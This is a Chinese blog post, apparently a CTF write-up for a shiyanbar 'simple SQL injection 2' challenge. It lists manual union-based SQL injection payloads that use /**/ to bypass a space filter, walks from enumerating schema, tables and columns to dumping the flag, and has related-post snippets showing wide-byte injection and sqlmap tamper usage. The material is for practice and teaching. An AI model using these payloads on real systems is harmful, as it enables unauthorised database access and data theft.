[CTF]简单的sql注入之2

最新推荐文章于 2025-10-11 10:48:26 发布
原创 最新推荐文章于 2025-10-11 10:48:26 发布 · 706 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在一个存在ID回显的Web应用中进行SQL注入的手工攻击过程。通过使用特殊字符绕过空格过滤,成功爆破数据库名、数据表名、字段名及最终的FLAG信息。案例展示了如何利用SQL注入获取敏感数据。

类型:web
网址:http://www.shiyanbar.com/ctf/1908
攻击:sql注入
一句话总结:
id有回显的sql注入(手工)

Writeup:

测试发现过滤空格,用/**/代替空格

爆数据库名称:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果:web1

爆数据表名称:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/and/**/'1'='1

结果三个表,分别是baloteli、flag、web_1

爆flag表字段:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='web1'/**/and/**/table_name='flag'/**/and/**/'1'='1

结果三个字段,分别是baloteli、flag、id

爆flag表flag字段的数据:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据,分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}

CTF-SQL注入
m0_66921984的博客
04-14 1030
输入 1' union select version(),group_concat(column_name) from information_schema.columns where table_schema='dvwa'and table_name='users'#这里我们用了一个函数,group_concat(),这个函数你们可以在网卡搜一下,就是把查到的列放在一个数组里面,大白话,就是都放一块,好看一些。id=1 and 1=1 or id=1 and 1=2 如果都没报错,那么就是字符类型。
CTF常用sql注入(一)联合注入和宽字节
2301_81040377的博客
07-04 751
给自己总结一下sql注入的常用姿势吧,记录一下学习。
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
sql简单注入
weixin_51646864的博客
06-13 742
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
浅谈SQL注入,看完就知道到底怎么个事儿了~
最新发布
bigbangbangbang1的博客
10-11 995
遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。id=1asdf union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = ‘指定表的名字’但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限。
实验吧简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 232
接上面一篇博客。 实验吧简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
实验吧——简单SQL注入2
box
07-06 190
首先输入1,发现有将数据库的查询结果显示出来 输入单引号,发现错误,这时候可以猜测后台查询语句:select name from table where id=‘xxx’; 可以先尝试万能密码 ‘=’ 查询语句就变成 select name from table where id=’’=’’; 会把所以结果都显示出来一共三条记录 接下来继续测试,输入’=‘select,或者’=‘or等等发现仍...
记一次简单SQL注入
he320631127的博客
08-06 636
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
ctf-sql注入学习笔记
wwwyyyxxxx的博客
03-04 403
盲注:根据不同的输入得到的不同响应判断语句的正确性,进一步解flag,一般使用脚本或者sqlmap更方便,盲注又分为时间盲注和布尔盲注。sql注入原理:用户的输入未经检验或者成功逃逸,与sql语句拼接造成非法操作。时间盲注:根据页面的响应时间判断语句的真假一般使用if和sleep搭配使用。报错注入:利用特定函数的报错特性,使结果跟随报错一同输出。联合查询:使用union拼接其他语句查询。暂时写到这,有时间再写。
CTF-Web学习笔记:SQL注入
Deng7326的博客
07-28 1371
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
CTFSQL注入常见题型整理.pdf
05-13
在网络安全竞赛CTF(Capture The Flag)中,SQL注入是一种常见的攻击技术,它通过在应用程序中注入恶意的SQL代码来利用后端数据库。本文整理了CTFSQL注入的常见题型,便于参与者练习和掌握不同情况下的注入技巧。 ...
实验吧简单sql注入解题思路
ZweLL032的博客
03-17 8414
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
实验吧-简单sql注入2
臭nana的博客
01-10 300
看到网上手工的wp那么多,就写一个sqlmap的 直接kali终端一条指令sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php --dump --batch --tamper=space2comment 拿到flag
决斗场 - 实验吧 WEB 简单sql注入2
RaAlGhul的博客
11-15 796
题目链接:http://www.shiyanbar.com/ctf/1908 简单sql注入……2? 做完这题感觉这题比起上一道题区别不大,如果大家对第一题的具体思路做法还不是很了解的话,这里给出小编第一题讲解的传送门:简单sql注入。 首先,进行上一题中的每一步测试,以及尝试提交上一题中得到flag的语句。 当然,如果上一题的语句能在这道题中得到flag那这题还有什么意义呢(
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1574
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
SQL简单注入步骤
m0_62092622的博客
01-25 2448
sql-labs第一为例 检查网站能否注入 http://localhost:63342/WWW/sqli-labs/Less-1/index.php?id=1' //记得单引号要在英文输入法下 输入单引号之前不报错,输入单引号后报错,即可说明网站存在注入 查询表列数 http://localhost:63342/WWW/sqli-labs/Less-1/index.php?id=1' order by 1 --+ http://localhost:6
所谓最简单SQL注入
扯蛋的青春与蛋痛的生活
01-12 1992
今天没带眼镜,,所以不太想干活 也不知怎的, 对公司另一同事写的业务台模块来了兴趣..帮其"测试一下" 在VC的代码片段是 CString SqlText = "Select User_ID, Login_Name, Login_Pwd, Chinese_Name, Operation from A_Employee Where Login_Name = '" +
简单SQL注入(小白级)
m0_46625346的博客
05-18 592
简单SQL注入 1.找数据库名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23 //找数据库名 得到wfafaefawcaf 2.找表名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(table_name),3 f
简单sql注入之一 (实验吧)
wewww111的博客
08-11 3960
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等键词都被过滤 键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
CTF竞赛SQL注入题型详解:从基础到高级攻击技巧
资源摘要信息:"网络安全CTF竞赛中SQL注入题型解析:常见攻击手法与绕过技巧总结" SQL注入攻击是一种常见的网络攻击手段,主要应用于Web应用程序,攻击者通过在应用程序输入字段中注入恶意SQL代码,以操作后端数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值